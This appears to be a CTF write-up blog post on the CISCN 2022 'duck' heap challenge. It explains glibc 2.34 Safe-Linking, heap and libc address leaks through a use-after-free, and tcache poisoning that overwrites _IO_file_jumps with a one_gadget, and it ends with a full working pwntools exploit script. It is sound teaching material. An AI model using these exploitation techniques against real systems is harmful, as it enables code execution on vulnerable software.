[CISCN 2022 華東北]duck

I. Challenge source

NSSCTF-Pwn-[CISCN 2022 華東北]duck

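II. Information gathering

Check the file type with the file command:

Check which protections the binary has enabled with checksec:

The challenge ships both the libc and the dynamic linker. I originally hoped to set up the environment with pwninit, but it failed: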

$ pwninit
bin: ./ld.so
libc: ./libc.so.6

warning: failed detecting libc version (is the libc an Ubuntu glibc?): failed finding version string
copying ./ld.so to ./ld.so_patched
running patchelf on ./ld.so_patched
writing solve.py stub

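Judging from the warning, pwninit could not detect the libc version. It also mistook the linker for the target binary and patched that instead.

Since pwninit does not work for this challenge, we specify the linker and the libc manually: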

from pwn import *

exe = ELF("./pwn")
libc = ELF("./libc.so.6")
ld = ELF("./ld.so")

p = process([ld.path, exe.path], env={"LD_PRELOAD": libc.path})

III. Analyzing the decompiled binary

The output of menu gives a rough idea of what the program implements:

ssize_t menu()
{
  puts("1.Add");
  puts("2.Del");
  puts("3.Show");
  puts("4.Edit");
  return write(1, "Choice: ", 8u);
}

Let's go through the functions one by one.

1. Add

int Add()
{
  int i; // [rsp+4h] [rbp-Ch]
  void *v2; // [rsp+8h] [rbp-8h]

  v2 = malloc(0x100u);
  for ( i = 0; i <= 19; ++i )
  {
    if ( !heaplist[i] )
    {
      heaplist[i] = v2;
      puts("Done");
      return 1;
    }
  }
  return puts("Empty!");
}

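Add allocates a block of memory dynamically:

- the requested size is always 0x100;
- every allocated chunk is tracked in the heaplist[] array;
- at most 20 chunks can be allocated.

2. Del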

int Del()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = sub_1249();
  if ( v1 <= 20 && heaplist[v1] )
  {
    free((void *)heaplist[v1]);
    return puts("Done");
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

Del locates a chunk by the given index and frees it, but the pointer is not set to NULL after the free, so there is a UAF.

3. Show

int Show()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = sub_1249();
  if ( v1 <= 20 && heaplist[v1] )
  {
    puts((const char *)heaplist[v1]);
    return puts("Done");
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

Show prints the user data of the chunk at the given index. Because it uses puts, the output stops at the first NUL byte.

4. Edit

int Edit()
{
  int v1; // [rsp+8h] [rbp-8h]
  unsigned int v2; // [rsp+Ch] [rbp-4h]

  puts("Idx: ");
  v1 = sub_1249();
  if ( v1 <= 20 && heaplist[v1] )
  {
    puts("Size: ");
    v2 = sub_1249();
    if ( v2 > 0x100 )
    {
      return puts("Error");
    }
    else
    {
      puts("Content: ");
      READ(heaplist[v1], v2);
      puts("Done");
      return 0;
    }
  }
  else
  {
    puts("Not allow");
    return v1;
  }
}

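Edit overwrites the user data of the chunk at the given index.

The maximum input length is 0x100.

IV. Approach

1. Attack primitives available so far

(1) UAF + Show: lets us leak the metadata of freed chunks.
(2) UAF + Edit: lets us modify the metadata of chunks that sit in a bin.
(3) Building on (2), we get an arbitrary address write.

2. Safe-Linking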

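First, the glibc version used by this challenge is 2.34:

This version includes Safe-Linking (introduced in glibc 2.32), a mitigation against attacks on the tcache and fastbin lists: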

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

How the tcache applies this protection:

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = 0;
  return (void *) e;
}

To understand this protection, we first need to know how a chunk is inserted into a tcache bin. Focus on this code:

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Leaving the protection aside, the insertion simplifies to:

e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;

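This is a standard head insertion: the next pointer of the current chunk is set to the current head of the tcache bin, and then the chunk itself becomes the head.

Now we can see what the protection does. It stores the fd pointer as:
$$
fd = (\text{Current\_chunk\_address} \gg 12) \oplus \text{Next\_chunk\_address}
$$
where Current_chunk_address is the address at which the pointer is stored (&e->next) and Next_chunk_address is the previous head of the bin.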
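As a minimal sketch of the formula above, the two macros can be modelled in Python. The function names protect_ptr and reveal_ptr and both addresses are illustrative assumptions, not values taken from the challenge.

```python
MASK64 = (1 << 64) - 1


def protect_ptr(pos: int, ptr: int) -> int:
    """Model of PROTECT_PTR: XOR the pointer with (storage address >> 12)."""
    return ((pos >> 12) ^ ptr) & MASK64


def reveal_ptr(pos: int, mangled: int) -> int:
    """Model of REVEAL_PTR: XOR is its own inverse, so the same operation unmangles."""
    return protect_ptr(pos, mangled)


# Hypothetical addresses, chosen only for illustration.
pos = 0x555555559900         # address of e->next inside the chunk being freed
next_chunk = 0x5555555597F0  # current head of the tcache bin

fd = protect_ptr(pos, next_chunk)
print(hex(fd))
print(hex(reveal_ptr(pos, fd)))  # round-trips back to next_chunk
```

The round trip only works when the storage address is known up to its page number, which is why a heap leak matters for the rest of the exploit.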

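Therefore, to bypass the protection we need to know the address of the chunk. In other words, the question is whether we can obtain a heap address.

With the primitives found so far, leaking the heap base is possible.

Safe-Linking makes heap exploitation harder, but it also produces a very interesting side effect.

When a tcache bin is empty and a chunk is about to be put into it, the head of the bin is 0 at that moment!

We can see this from the tcache initialization: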

static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
  if (!victim && ar_ptr != NULL)
    {
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }


  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later.  However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway.  */
  if (victim)
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }

}

Key points:

- victim = _int_malloc (ar_ptr, bytes); first allocates a block of sizeof (tcache_perthread_struct) bytes from the arena.
- tcache = (tcache_perthread_struct *) victim; treats that block as a tcache_perthread_struct.
- memset (tcache, 0, sizeof (tcache_perthread_struct)); zeroes the whole structure.

So once the tcache is initialized, and as long as a given bin has never held a chunk, tcache->entries[tc_idx] is guaranteed to be 0.

XORing any number with 0 yields the number itself, so we get:

$$
fd = \text{Current\_chunk\_address} \gg 12
$$

The code also shows that tcache initialization allocates sizeof (tcache_perthread_struct) bytes dynamically. From the structure and the corresponding macro:

typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

# define TCACHE_MAX_BINS		64

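counts array:
- element type uint16_t (2 bytes)
- 64 elements
- size: $64 \times 2 = 128$ bytes (0x80)
entries array:
- element type pointer (8 bytes)
- 64 elements
- size: $64 \times 8 = 512$ bytes (0x200)
Total data size of the structure:
- 0x80 + 0x200 = 0x280 bytes
Plus the chunk header:
- 0x280 + 0x10 = 0x290 bytes

So the size of the tcache management chunk (the size field, chunk header included) is 0x290.

Note that this size differs between glibc versions. Do not memorize it; derive it from the source.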
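The derivation can be checked with a few lines of Python. This is a sketch for x86-64 only; request2size here is a simplified model of the glibc macro of the same name, and the 1-byte counts variant is an assumption standing in for older glibc releases that declared counts with a narrower type.

```python
SIZE_SZ = 8                      # sizeof(size_t) on x86-64
MALLOC_ALIGNMENT = 2 * SIZE_SZ   # 16
MINSIZE = 4 * SIZE_SZ            # 0x20
TCACHE_MAX_BINS = 64


def request2size(req: int) -> int:
    """Chunk size (header included) used for a request of req bytes."""
    size = (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)


def tcache_struct_size(count_bytes: int) -> int:
    """sizeof(tcache_perthread_struct) for a given width of one counts[] entry."""
    return TCACHE_MAX_BINS * count_bytes + TCACHE_MAX_BINS * 8


new = tcache_struct_size(2)  # uint16_t counts, as in the struct shown above
old = tcache_struct_size(1)  # assumption: 1-byte counts, as in older releases

print(hex(new), hex(request2size(new)))  # 0x280 0x290
print(hex(old), hex(request2size(old)))  # 0x240 0x250
```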

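The chunk you request is allocated right after the tcache management chunk. So as long as the requested chunk is not very large, its address satisfies $< \text{heap\_base\_address} + 0x1000$.

The heap base, because of page alignment, is normally a multiple of 0x1000.

In other words, if we take the fd value at this point and compute

$$
fd = fd \ll 12
$$

the resulting address is very likely the heap base.

Shifting a number right by 12 bits and then left by 12 bits clears its lowest 12 bits.

For example:

- the heap starts at 0xaa……a000;
- the chunk you allocated is located at 0xaa……a500.

Applying $\gg 12$ and then $\ll 12$ to 0xaa……a500 yields 0xaa……a000, which is the heap base.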
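The same reasoning as a small Python sketch. The heap base below is a hypothetical page-aligned value, and the offsets assume the first user chunk sits directly after the 0x290-byte tcache management chunk, as derived earlier.

```python
PAGE_SHIFT = 12


def leaked_fd_for_empty_bin(pos: int) -> int:
    """Value tcache_put stores in next when the bin was empty: (pos >> 12) ^ 0."""
    return (pos >> PAGE_SHIFT) ^ 0


def heap_base_from_fd(fd: int) -> int:
    """Undo the shift; the low 12 bits were already discarded by the mangling."""
    return fd << PAGE_SHIFT


heap_base = 0x555577C12000                   # hypothetical, page aligned
first_chunk_mem = heap_base + 0x290 + 0x10   # user data of the first 0x110 chunk

fd = leaked_fd_for_empty_bin(first_chunk_mem)
print(hex(fd), hex(heap_base_from_fd(fd)))

# Right shift followed by left shift equals masking off the low 12 bits.
assert (first_chunk_mem >> 12) << 12 == first_chunk_mem & ~0xFFF
```

The recovery is exact only while the freed chunk lives in the first page of the heap; for a chunk further away the result is the base of that chunk's page instead.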

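3. Removal of the hooks

glibc 2.34 removed the malloc hooks (__malloc_hook, __free_hook, __realloc_hook and __memalign_hook), which means the classic hook-hijacking route is closed.

4. Route

In summary, a workable exploitation route is: after leaking the heap base and the libc base, use the arbitrary address write to overwrite an entry of an _IO_jump_t instance in __libc_IO_vtables (for example _IO_file_jumps) with a one_gadget.

V. PoC

1. Wrappers for the program's four functions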

def Add():
    p.sendafter(b'Choice: ',b'1')

def Del(index):
    p.sendafter(b'Choice: ',b'2')
    p.sendafter(b'Idx: ',index)

def Show(index):
    p.sendafter(b'Choice: ',b'3')
    p.sendafter(b'Idx: ',index)

def Edit(index,size,content):
    p.sendafter(b'Choice: ',b'4')
    p.sendafter(b'Idx: ',index)
    p.sendafter(b'Size: ',size)
    p.sendafter(b'Content: ',content)

2. Leaking the heap base

We can first verify the earlier analysis by allocating one chunk:

Add() # 0
gdb.attach(p)
pause()

This confirms that the tcache management chunk is indeed 0x290 bytes.

Now free the chunk we allocated:

Add() # 0
Del(b'0')
gdb.attach(p)
pause()

After computing $fd = fd \ll 12$ on the fd pointer, the result is indeed the heap base.

The leak:

Add() # 0
Del(b'0')

Show(b'0')
p.recvline()
leak = u64(p.recvline()[:-1].ljust(8,b'\x00')) << 12
success("heap_base: " + hex(leak))
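For readers without pwntools at hand, the parsing step can be sketched with the standard library alone. The helper names emulate_puts and parse_leak are hypothetical and exist only for this illustration; the leaked value is made up.

```python
def emulate_puts(value: int) -> bytes:
    """What puts() would print for a 64-bit value: bytes up to the first NUL, then a newline."""
    raw = value.to_bytes(8, "little")
    return raw.split(b"\x00", 1)[0] + b"\n"


def parse_leak(line: bytes) -> int:
    """Drop the trailing newline, pad back to 8 bytes, decode as little-endian."""
    return int.from_bytes(line[:-1].ljust(8, b"\x00"), "little")


fd = 0x555577C12                  # hypothetical mangled pointer of an empty bin
line = emulate_puts(fd)
print(line, hex(parse_leak(line) << 12))
```

The padding is needed because puts stops at the first NUL byte, so fewer than 8 bytes arrive. A leaked value that happens to contain a 0x00 or 0x0a byte in the middle would be truncated, in which case rerunning the exploit is the usual remedy.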

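3. Leaking the libc base

This leak should be familiar to most readers: it relies on the behaviour of the unsorted bin.

The key question is how to get a chunk into the unsorted bin.

In this challenge every chunk is requested with size 0x100, which qualifies for the tcache but not for the fastbins.

This too can be worked out from the glibc source; here is the relevant part: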

#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)

# define TCACHE_MAX_BINS		64
# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables.  */
# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
……
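Plugging x86-64 values into these macros makes the claim concrete. The sketch below assumes SIZE_SZ = 8, MALLOC_ALIGNMENT = 16 and MINSIZE = 0x20, and uses a simplified request2size; it compares request sizes against the upper bounds only, not against the runtime value of global_max_fast.

```python
SIZE_SZ = 8
MALLOC_ALIGNMENT = 2 * SIZE_SZ
MINSIZE = 4 * SIZE_SZ
TCACHE_MAX_BINS = 64

MAX_FAST_SIZE = 80 * SIZE_SZ // 4  # largest request the fastbins can ever serve


def tidx2usize(idx: int) -> int:
    """Largest usable size served by tcache bin idx."""
    return idx * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ


def request2size(req: int) -> int:
    """Chunk size (header included) used for a request of req bytes."""
    size = (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)


MAX_TCACHE_SIZE = tidx2usize(TCACHE_MAX_BINS - 1)

request = 0x100                              # the size Add() passes to malloc
fits_fastbin = request <= MAX_FAST_SIZE
fits_tcache = request <= MAX_TCACHE_SIZE

print(hex(MAX_FAST_SIZE), hex(MAX_TCACHE_SIZE))   # 0xa0 0x408
print(hex(request2size(request)), fits_fastbin, fits_tcache)  # 0x110 False True
```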

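Chunks reach the unsorted bin in the following ways:

- When a larger chunk is split in two and the remainder is larger than MINSIZE, the remainder is placed in the unsorted bin.
- When a chunk that belongs to neither a tcache bin nor a fast bin is freed and it is not adjacent to the top chunk, it is first placed in the unsorted bin.
- During malloc_consolidate, a merged chunk may be placed in the unsorted bin if it is not adjacent to the top chunk.

By the second rule, once the tcache bin is full, the next freed chunk goes to the unsorted bin. The fill limit is: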

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7

#if USE_TCACHE
  ,
  .tcache_count = TCACHE_FILL_COUNT,
  .tcache_bins = TCACHE_MAX_BINS,
  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
  .tcache_unsorted_limit = 0 /* No limit.  */
#endif

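Clearly, each tcache bin holds at most 7 chunks. Once the tcache bin for size 0x110 (chunk header included) is full, freeing one more chunk that is too large for the fastbins sends it to the unsorted bin, provided it is not adjacent to the top chunk.

How do we keep it away from the top chunk?

Simple: allocate one more chunk after the one that will be freed eighth. The corresponding code: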

for i in range(9):
    Add()
for i in range(1,9):
    Del(str(i).encode())

gdb.attach(p)
pause()

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x555577c12a00
Size: 0x110 (with flag bits: 0x111)
fd: 0x7310f94e8cc0
bk: 0x7310f94e8cc0

Current index usage:
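To make the index bookkeeping concrete, here is a rough simulation of the sequence so far. It is a deliberately simplified model (one tcache bin of 7 entries, fresh chunks carved from the top, no consolidation, no reuse of unsorted chunks), with chunk positions given as offsets from the heap base; it is not the allocator's real logic.

```python
CHUNK = 0x110        # chunk size for malloc(0x100)
TCACHE_LIMIT = 7

heaplist = [None] * 20
tcache, unsorted = [], []
top = 0x290          # first chunk starts right after the tcache management chunk


def add() -> int:
    """Model of Add(): take from the tcache if possible, else carve from the top."""
    global top
    if tcache:
        chunk = tcache.pop()
    else:
        chunk, top = top, top + CHUNK
    slot = heaplist.index(None)   # first empty slot, as in the Add() loop
    heaplist[slot] = chunk
    return slot


def delete(idx: int) -> None:
    """Model of Del(): the slot is NOT cleared, which is the UAF."""
    chunk = heaplist[idx]
    if len(tcache) < TCACHE_LIMIT:
        tcache.append(chunk)
    elif chunk + CHUNK != top:    # not adjacent to the top chunk
        unsorted.append(chunk)


add()
delete(0)
for _ in range(9):
    add()
for i in range(1, 9):
    delete(i)

for i, chunk in enumerate(heaplist[:10]):
    state = "tcache" if chunk in tcache else "unsorted" if chunk in unsorted else "in use"
    print(i, hex(chunk), state)
```

In this model indices 0 and 1 alias the same chunk, index 7 (offset 0x8f0) is the head of the tcache bin, index 8 (offset 0xa00) is the unsorted chunk, and index 9 stays allocated as the guard against the top chunk. The next two calls to Add() would therefore land in slots 10 and 11.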

Leaking the libc address:

Show(b'8')
p.recvline()
leak = u64(p.recvline()[:-1].ljust(8,b'\x00'))
offset = 96
main_arena = libc.symbols['main_arena']
libc_base = leak - offset - main_arena
success("libc_base: " + hex(libc_base))

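4. Hijacking

Our target is the _IO_jump_t instance that the vtable pointer of a FILE structure points to. We replace a function address in it with the one_gadget we prepared.

So which FILE structure should we go after?

Pick an I/O function, for example puts, and find its definition in the glibc source: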

#include "libioP.h"
#include <string.h>
#include <limits.h>

int
_IO_puts (const char *str)
{
  int result = EOF;
  size_t len = strlen (str);
  _IO_acquire_lock (stdout);

  if ((_IO_vtable_offset (stdout) != 0
       || _IO_fwide (stdout, -1) == -1)
      && _IO_sputn (stdout, str, len) == len
      && _IO_putc_unlocked ('\n', stdout) != EOF)
    result = MIN (INT_MAX, len + 1);

  _IO_release_lock (stdout);
  return result;
}

weak_alias (_IO_puts, puts)
libc_hidden_def (_IO_puts)

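Every call here that takes the FILE structure can be traced through the glibc source to follow its call flow.

Take _IO_putc_unlocked as an example and find its definition: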

#define _IO_putc_unlocked(_ch, _fp) __putc_unlocked_body (_ch, _fp)

Next, find the definition of __putc_unlocked_body (_ch, _fp):

#define __putc_unlocked_body(_ch, _fp)					\
  (__glibc_unlikely ((_fp)->_IO_write_ptr >= (_fp)->_IO_write_end)	\
   ? __overflow (_fp, (unsigned char) (_ch))				\
   : (unsigned char) (*(_fp)->_IO_write_ptr++ = (_ch)))

Understanding this code requires some knowledge of the FILE structure. Here are the relevant fields:

struct _IO_FILE
{
  ……
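  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */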
  ……
};

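Clearly, when the buffer is full (_IO_write_ptr >= _IO_write_end), __overflow() is called, which dispatches through the __overflow entry defined in the _IO_jump_t structure: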

#define JUMP_FIELD(TYPE, NAME) TYPE NAME

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow); // here: flushes the buffer
    JUMP_FIELD(_IO_underflow_t, __underflow); 
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    ……
};
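Since every field in this table is pointer sized on x86-64, the offset of each entry follows from its position. The sketch below covers only the leading fields listed above (the remaining entries are left out), and the helper overwrite_up_to and the placeholder value are hypothetical, introduced purely for illustration.

```python
import struct

# Leading fields of _IO_jump_t in declaration order; later entries are omitted.
FIELDS = [
    "__dummy", "__dummy2", "__finish", "__overflow",
    "__underflow", "__uflow", "__pbackfail",
]
PTR = 8  # pointer (and size_t) width on x86-64

offsets = {name: index * PTR for index, name in enumerate(FIELDS)}


def overwrite_up_to(field: str, value: int) -> bytes:
    """Bytes that zero every slot before `field` and place `value` in `field`."""
    padding = struct.pack("<Q", 0) * (offsets[field] // PTR)
    return padding + struct.pack("<Q", value)


placeholder = 0x4141414141414141  # stands in for a real code address
payload = overwrite_up_to("__overflow", placeholder)
print(hex(offsets["__overflow"]), len(payload))  # 0x18 32
```

A write that starts at the beginning of the table therefore needs three 8-byte words of padding before the value destined for __overflow. Note that such a write also clobbers __finish.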

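As we know, the vtable pointer points to an instance of this structure. The vtable pointer in stdout points to _IO_file_jumps.

Why this particular mapping?

Again starting from the source, in libio/stdio.c we find: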

FILE *stdout = (FILE *) &_IO_2_1_stdout_;

_IO_2_1_stdout_ in turn is defined as follows:

#ifdef _IO_MTSAFE_IO
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
  static _IO_lock_t _IO_stdfile_##FD##_lock = _IO_lock_initializer; \
  static struct _IO_wide_data _IO_wide_data_##FD \
    = { ._wide_vtable = &_IO_wfile_jumps }; \
  struct _IO_FILE_plus NAME \
    = {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
       &_IO_file_jumps};
#else
# define DEF_STDFILE(NAME, FD, CHAIN, FLAGS) \
  static struct _IO_wide_data _IO_wide_data_##FD \
    = { ._wide_vtable = &_IO_wfile_jumps }; \
  struct _IO_FILE_plus NAME \
    = {FILEBUF_LITERAL(CHAIN, FLAGS, FD, &_IO_wide_data_##FD), \
       &_IO_file_jumps};
#endif

DEF_STDFILE(_IO_2_1_stdin_, 0, 0, _IO_NO_WRITES);
DEF_STDFILE(_IO_2_1_stdout_, 1, &_IO_2_1_stdin_, _IO_NO_READS);
DEF_STDFILE(_IO_2_1_stderr_, 2, &_IO_2_1_stdout_, _IO_NO_READS+_IO_UNBUFFERED);

Expanding the macro gives the equivalent definition:

struct _IO_FILE_plus _IO_2_1_stdout_ =
{
    FILEBUF_LITERAL(...),   // fills in all the preceding _IO_FILE fields
    &_IO_file_jumps         // the vtable pointer
};

PoC:

'''
0xda861 execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xda864 execve("/bin/sh", r13, rdx)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xda867 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
one_gadget = [libc_base + 0xda861, libc_base + 0xda864, libc_base + 0xda867]

_IO_file_jumps = libc_base + libc.symbols['_IO_file_jumps']

target = ((heap_base + 0x8f0) >> 12) ^ (_IO_file_jumps) # Safe-Linking; note that the offset 0x8f0 was found by dynamic debugging
Edit(b'7',b'8',p64(target))

Add()
Add()

Edit(b'11',b'64',p64(0)*3 + p64(one_gadget[1])) # after testing, the second one_gadget works
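Why two calls to Add() are needed can be seen in a toy model of a single tcache bin under Safe-Linking. Everything here is an assumption made for illustration: the TcacheBin class, the dict standing in for memory, and both the heap base and the target address. The per-bin counter that real glibc also maintains is not modelled.

```python
PAGE_SHIFT = 12


def protect(pos: int, ptr: int) -> int:
    """PROTECT_PTR / REVEAL_PTR model: XOR with the page number of pos."""
    return (pos >> PAGE_SHIFT) ^ ptr


class TcacheBin:
    """One tcache bin; memory maps an address to the mangled next value stored there."""

    def __init__(self) -> None:
        self.head = 0
        self.memory = {}

    def put(self, entry: int) -> None:
        self.memory[entry] = protect(entry, self.head)
        self.head = entry

    def get(self) -> int:
        entry = self.head
        if entry & 0xF:
            raise RuntimeError("malloc(): unaligned tcache chunk detected")
        # Addresses never written in this model read back as 0.
        self.head = protect(entry, self.memory.get(entry, 0))
        return entry


heap_base = 0x555577C12000          # hypothetical leaked heap base
chunk6 = heap_base + 0x7E0 + 0x10   # user pointers of two freed chunks
chunk7 = heap_base + 0x8F0 + 0x10
target = 0x7310F94E9600             # hypothetical 16-byte aligned libc address

tbin = TcacheBin()
tbin.put(chunk6)
tbin.put(chunk7)                    # chunk7 is now the head of the bin

# UAF edit: overwrite chunk7's next with the mangled target.
tbin.memory[chunk7] = protect(heap_base + 0x8F0, target)

first = tbin.get()
second = tbin.get()
print(hex(first), hex(second))
```

The first allocation returns the poisoned chunk itself and only the second one returns the target. Using the chunk header offset 0x8f0 instead of the user pointer offset 0x900 makes no difference, because both lie in the same page.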

5. Full PoC

from pwn import *

exe = ELF("./pwn")
libc = ELF("./libc.so.6")
ld = ELF("./ld.so")

p = process([ld.path, exe.path], env={"LD_PRELOAD": libc.path})

def Add():
    p.sendafter(b'Choice: ',b'1')

def Del(index):
    p.sendafter(b'Choice: ',b'2')
    p.sendafter(b'Idx: ',index)

def Show(index):
    p.sendafter(b'Choice: ',b'3')
    p.sendafter(b'Idx: ',index)

def Edit(index,size,content):
    p.sendafter(b'Choice: ',b'4')
    p.sendafter(b'Idx: ',index)
    p.sendafter(b'Size: ',size)
    p.sendafter(b'Content: ',content)

Add() # 0
Del(b'0')

Show(b'0')
p.recvline()
heap_base = u64(p.recvline()[:-1].ljust(8,b'\x00')) << 12
success("heap_base: " + hex(heap_base))

for i in range(9):
    Add()
for i in range(1,9):
    Del(str(i).encode())

Show(b'8')
p.recvline()
leak = u64(p.recvline()[:-1].ljust(8,b'\x00'))
offset = 96
main_arena = libc.symbols['main_arena']
libc_base = leak - offset - main_arena
success("libc_base: " + hex(libc_base))

'''
0xda861 execve("/bin/sh", r13, r12)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [r12] == NULL || r12 == NULL || r12 is a valid envp

0xda864 execve("/bin/sh", r13, rdx)
constraints:
  [r13] == NULL || r13 == NULL || r13 is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp

0xda867 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL || rsi is a valid argv
  [rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
one_gadget = [libc_base + 0xda861, libc_base + 0xda864, libc_base + 0xda867]

_IO_file_jumps = libc_base + libc.symbols['_IO_file_jumps']

target = ((heap_base + 0x8f0) >> 12) ^ (_IO_file_jumps)
Edit(b'7',b'8',p64(target))

Add()
Add()

Edit(b'11',b'64',p64(0)*3 + p64(one_gadget[1]))

p.interactive()

YouDiscovered1t Blog
